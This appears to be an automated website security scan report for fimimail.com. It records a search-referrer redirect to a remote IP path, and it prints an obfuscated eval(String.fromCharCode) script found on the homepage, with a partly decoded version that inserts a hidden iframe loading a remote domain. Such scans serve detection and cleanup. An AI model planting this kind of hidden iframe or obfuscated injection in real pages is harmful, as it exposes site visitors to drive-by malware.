Malicious/Suspicious Redirects
Request (imitation of a visitor arriving from a search engine):
    URL: http://www.fimimail.com/
    GET / HTTP/1.1
    Host: www.fimimail.com
    Referer: http://www.google.com/search?q=redirect+check1
Server response:
    HTTP/1.1 301 Moved Permanently
    Connection: close
    Date: Sat, 21 Mar 2015 19:31:17 GMT
    Location: http://216.120.231.11/~aggieba/coppermine/include/
    Server: Apache
    Content-Length: 258
    Content-Type: text/html; charset=iso-8859-1
Status: malicious
Scanned pages/files
Request: http://www.fimimail.com/
Server response:
    200 OK
    Content-Length: 8352
    Content-Type: text/html
Status: malicious
Malicious code - confirmed by antiviruses (see below):

    eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3

Decoded script:

    function getMonthNum(abbMonth) {
        var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" );
        var i;
        for (i = 0; i < arrMon.length; i++) {
            if (abbMonth == arrMon[i]) { return i; }
        }
        return -1;
    }
    function dateUTCdateToDate(dateString) {
        var arrDateStr = dateString.split(" ");
        var month = getMonthNum(arrDateStr[2]);
        var day = arrDateStr[1 s.setAttribute("src", current_domain);
        document.body.appendChild(s);
        } catch (e) { }
    }
    /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */

Antivirus reports:
Request: http://www.fimimail.com/test404page.js
Server response:
    HTTP/1.1 302 Found
    Connection: close
    Date: Sat, 21 Mar 2015 19:31:17 GMT
    Location: http://216.120.231.11/~aggieba/coppermine/include/
    Server: Apache
    Content-Length: 234
    Content-Type: text/html; charset=iso-8859-1
Status: clean

Request: http://216.120.231.11/~aggieba/coppermine/include/
Server response:
    404 Not Found
    Content-Length: 2042
    Content-Type: text/html
Status: clean

Request: http://216.120.231.11/test404page.js
Server response:
    404 Not Found
    Content-Length: 2014
    Content-Type: text/html
Status: clean
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fimimail.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fimimail.com/
Result: fimimail.com is not infected or malware details are not published yet.